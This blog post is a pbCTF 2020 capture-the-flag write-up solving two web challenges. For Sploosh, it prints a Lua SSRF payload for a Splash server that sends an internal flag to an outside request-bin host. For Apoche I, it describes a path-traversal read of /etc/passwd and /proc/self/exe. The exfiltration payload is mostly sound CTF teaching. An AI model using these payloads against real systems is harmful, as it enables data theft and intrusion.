---
layout: post
date: 2020-12-07 00:00:00
title: "pbCTF 2020 Write Up"
categories: CTF
tags: [Path Traversal, SSRF]
author:
  - Jeongwon Jo
---
I participated by opening the CTF this time at Perfect Blue. Let's write Write Up only for web challenges solved by CTF.

---
## <span style="color:#21C587"></span> (Web) Sploosh [156 pts]

This time, we will solve a problem called Sploosh among web challenge from pbCTF.
![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Sploosh/1.png?raw=true)
When you come into challenge, you can see that there is a form for entering the URL, and you can download the source code by clicking here.<br><br>

Once you think about it before looking at the source code, you might be suspicious of `SSRF` because it has the ability to type in the url.

```php
<?php
error_reporting(0);

header("Content-Type: application/json");

function fail() {
  echo "{}";
  die();
}

if (!isset($_GET['url'])) {
  fail();
}


$url = $_GET['url'];

if ($url === '') {
  fail();
}

try {
  $json = file_get_contents("http://splash:8050/render.json?timeout=1&url=" . urlencode($url));
  $out = array("geometry" => json_decode($json)->geometry);
  echo ($out);
} catch(Exception $e) {
  fail();
}
?>
```

Let's check the api.php source code. You can see that the url is input and the file is opened and checked with the file_get_contents() function. And you can see that the file value is output as the geometry value.
<br><br>
SSRF seems to be fired by the `file_get_contents()` function of api.php.

```php
<?php

$FLAG = getenv("FLAG");

$remote_ip = $_SERVER['REMOTE_ADDR'];
if ($remote_ip === "172.16.0.13" || $remote_ip === '172.16.0.14') {
  echo $FLAG;
} else {
  echo "No flag for you :)";
}
?>
```

Let's check the source code of flag.php. If the connection IP is `172.16.0.13` or `172.16.0.14`, you can see the flag is given.

And looking at the flag.php source code, you can see that the flag is only output on the internal server. So it looks like we need to put the flag in a specific variable and bring it to our private server.

Now I've searched for Sploosh to do an exploit. If you check [Sploosh's official homepage](https://splash.readthedocs.io/en/stable/scripting-tutorial.html#scripting-tutorial), you find that you can create and run Lua scripts by connecting to the `execute` endpoint.

![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Sploosh/2.png?raw=true)

The picture above is on the official Sploosh website. Looking at the contents, you can see that the `execute` endpoint sends the RCE payload using the lua_source parameter.

```lua
function main(exploit, args)
  exploit:go("http://172.16.0.14/flag.php")
  local flag = splash:html()
  exploit:go("requestbin" .. flag)
  return {geometry=data}
end
```
So, I wrote the SSRF + RCE payload as above using the lua script.
```python
flag = requests.get("http://172.16.0.14/flag.php")
requests.get("requestbin"+flag)
```
If the exploit code is interpreted in Python, it is as above.

Finally, if you connect and send the exploit code above to the excute endpoint, a flag will come to requestbin. (`URL encoding`)
```
payload : http%3A%2F%2Flocalhost%3A8050%2Fexecute%3Flua_source%3Dfunction%2520main%28splash%2C%2520args%29%2520splash%3Ago%28%2522http%3A%2F%2F172.16.0.14%2Fflag.php%2522%29%2520local%2520data%2520%3D%2520splash%3Ahtml%28%29%2520splash%3Ago%28%2522https://66409bdd5f994b912d1a7f0f28d3b33f.m.pipedream.net%2F%2522%2520..%2520data%29%2520return%2520%7Bgeometry%3Ddata%7D%2520end
```
So, I'll URL-encode the exploit code and pass it over.

![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Sploosh/3.png?raw=true)

When I sent the above exploit payload, I could see the flag coming to the requestbin.

> FLAG : pbctf{1_h0p3_y0u_us3d_lua_f0r_th1s}

---
## <span style="color:#21C587"></span> (Web) Apoche I [58 pts]

This time, we will solve a challenge called Apoche I among web challenge from pbCTF.
![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Apoche%20I/1.png?raw=true)
Looking at the challenge description, there are 5 URLs given. You can connect to an open server among 5 servers. (Some servers are closed.)

And looking at the hint, it says to get information about the binary.
![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Apoche%20I/2.png?raw=true)
I connected to 34.68.159.75:41521, and when I checked the robots.txt file, I could see that there is a secret directory. I thought LFI would happen here, so I grabbed a proxy and attempted an LFI attack.

![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Apoche%20I/3.png?raw=true)
When I grabbed the request using Burp Suite and accessed the `/etc/passwd` file, I could see that the `LFI` worked well.

![](https://github.com/wjddnjs33/image/blob/main/pbCTF%202020/Apoche%20I/4.png?raw=true)
So I accessed `/proc/self/exe` to get the `binary file`, and when I searched for `pbctf{`, I could see that the binary file had a flag.

> FLAG : pbctf{n0t_re4lly_apache_ap0che!}

---

